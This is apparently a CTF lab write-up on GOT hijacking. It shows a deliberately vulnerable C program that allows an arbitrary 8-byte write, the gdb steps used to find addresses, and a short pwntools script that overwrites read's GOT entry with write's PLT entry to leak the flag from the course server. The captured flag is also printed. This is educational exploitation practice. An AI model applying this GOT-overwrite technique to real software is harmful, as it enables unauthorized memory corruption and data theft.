Simple PWN - 0x06(GOT hijacking/Lab - got2win)
tags: CTF PWN eductf
challenge: nc edu-ctf.zoolab.org 10004
GOT Background
Lecture Vid. - Pwn week1 NTUSTISC - Pwn Basic 2 [2019.03.19]
Original Code
:::spoiler Original Code
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
char flag[0x30];
int main()
{
setvbuf(stdin, 0, _IONBF, 0);
setvbuf(stdout, 0, _IONBF, 0);
int fd = open("/home/chal/flag", O_RDONLY);
read(fd, flag, 0x30);
close(fd);
write(1, "Good luck !\n", 13);
unsigned long addr = 0;
printf("Overwrite addr: ");
scanf("%lu", &addr);
printf("Overwrite 8 bytes value: ");
read(0, (void *) addr, 0x8);
printf("Give me fake flag: ");
int nr = read(1, flag, 0x30);
if (nr <= 0)
exit(1);
flag[nr - 1] = '\0';
printf("This is your flag: ctf{%s}... Just kidding :)\n", flag);
return 0;
}
:::
- The program read the flag first at line
13~16 - At line
19~22, it allow user input an address and its value - At line
25, you may think it’s weird that it usestdoutasreadfunction’s parameter. - In addition, it doesn’t have buffer overflow, so that we can not use the technique before to get flag.
- Thus, our perspective is we can overlap the `read GOT` by `write plt`, so that it can execute write function:
int nr=write(1, flag, 0x30);
Exploit
- First, we should find the address of
read GOTandwrite pltgdb chal b *main() ni # Until write function si
- Then we wanna know
read GOTaddress
- My exploit is:
from pwn import * context.arch = 'amd64' r=remote('edu-ctf.zoolab.org', 10004) context.terminal = ['tmux', 'splitw', '-h'] read_got = 0x404038 write_plt = 0x4010c0 r.sendlineafter('Overwrite addr: ', str(read_got)) r.sendafter('Overwrite 8 bytes value: ', p64(write_plt)) r.interactive()Then, we can use
readfunction aswritefunction to get flag `FLAG{apple_1f3870be274f6c49b3e31a0c6728957f}`